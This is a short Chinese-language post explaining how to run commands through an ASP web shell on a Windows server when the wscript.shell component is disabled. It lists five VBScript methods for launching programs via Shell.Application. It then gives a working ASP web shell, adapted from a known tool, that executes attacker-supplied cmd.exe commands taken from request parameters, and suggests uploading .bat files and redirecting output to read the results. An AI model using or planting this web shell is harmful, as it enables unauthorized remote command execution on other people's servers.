wscript.shell组件被禁用时 可以用Shell.Application执行命令

 

wscript.shell 和 shell.application 这两个组件都是来执行程序的，因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ，忽略了 shell.application 。

 

我们可以首先在一个具有运行权限的目录上传一个bat文件，里面写上我们要运行的命令。然后调用 shell.application 组件运行这个bat。回显可以在bat中用重定向符号 > 到一个文本文件，想看命令的结果去读这个文件就可以了。当然也可以直接调用cmd执行命令。

 

抄 lcx 在 VBS 中 shell.application 运行文件的5种方法。

 

 

 

Set objShellApp = CreateObject("Shell.Application") Set objFolder = objShellApp.NameSpace("c:/") objFolder.Items().item("demo.exe").invokeverb '方法1 objFolder.Items().item("demo.exe").InvokeVerbEx'方法2 objShellApp.Open("C:/demo.exe") '方法3 objShellApp.ShellExecute "demo.exe","","c:/","","1" '方法4,可以加参数和设置参数值 '方法5 Set objFolderItem = objShellApp.NameSpace("C:/").Items().item("demo.exe") Set objFIVs = objFolderItem.Verbs() For i=0 To objFIVs.Count - 1 'MsgBox objFIVs.Item(i) Set objFIV = objFIVs.Item(i) If objFIV.Name = "打开(&O)" Then '右键菜单中在中文系统是"打开(&O)"，英文自己改 objFIV.DoIt Exit For End IF Next 改写下lcx的海洋2006。不认识代码啊，修改半天弄出一个不带回显的，用重定向自己去看吧。XP下测试成功。 <% On Error Resume Next Dim theFile, thePath, appPath, appName, appArgs appPath = Trim(Request("appPath")) appName = Trim(Request("appName")) appArgs = Trim(Request("appArgs")) If appName = "" Then appName = "cmd.exe" End If If appPath <> "" And Right(appPath, 1) <> "/" Then appPath = appPath & "/" End If If LCase(appName) = "cmd.exe" And appArgs <> "" Then If LCase(Left(appArgs, 2)) <> "/c" Then appArgs = "/c " & appArgs End If Else If LCase(appName) = "cmd.exe" And appArgs = "" Then appArgs = "/c " End If End If Set objShellApp = CreateObject("Shell.Application") objShellApp.ShellExecute appName, appArgs, appPath, "", 0 %>